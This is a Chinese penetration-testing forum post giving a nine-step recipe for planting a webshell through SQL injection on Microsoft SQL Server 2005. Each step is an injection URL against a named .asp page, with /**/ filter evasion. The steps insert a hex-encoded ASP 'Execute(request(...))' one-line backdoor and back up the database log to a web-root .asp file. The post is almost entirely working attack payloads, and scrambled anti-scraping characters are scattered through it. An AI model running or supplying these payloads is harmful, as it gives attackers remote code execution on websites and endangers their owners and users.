中国网络渗透测试联盟

标题: Mssql2005 Log备份Webshell [打印本页]

---

作者: admin    时间: 2012-9-15 14:25
标题: Mssql2005 Log备份Webshell
第一步
. J' s. Y; j3 h6 O6 a7 Ahttp://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--
+ n7 y! y8 y8 i4 l) q2 [1 X$ `! u
; t% ~6 j$ D; Z% l第二步：
3 M/ u% C0 ~- Phttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

第三步
3 T2 @0 Y) [8 s: C6 Mhttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
+ D2 |1 A+ J6 h3 R# O
1 I' G5 ]9 s1 n5 u  q! V第四步
http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--
* r5 l* V$ y7 l, |7 w& g; p5 M% |
第五步
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
9 q$ k4 I" E, d+ k$ d$ t: B
第六步
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--

, T! ^1 h, E8 O& X- D第七步
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

8 O3 `% n* Q3 q  P( R; q第八步
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
$ P  i* @7 D0 m8 E. b+ o3 L: _
第九步
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
7 {7 _" T8 h* C+ |& P" p0 q9 p

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2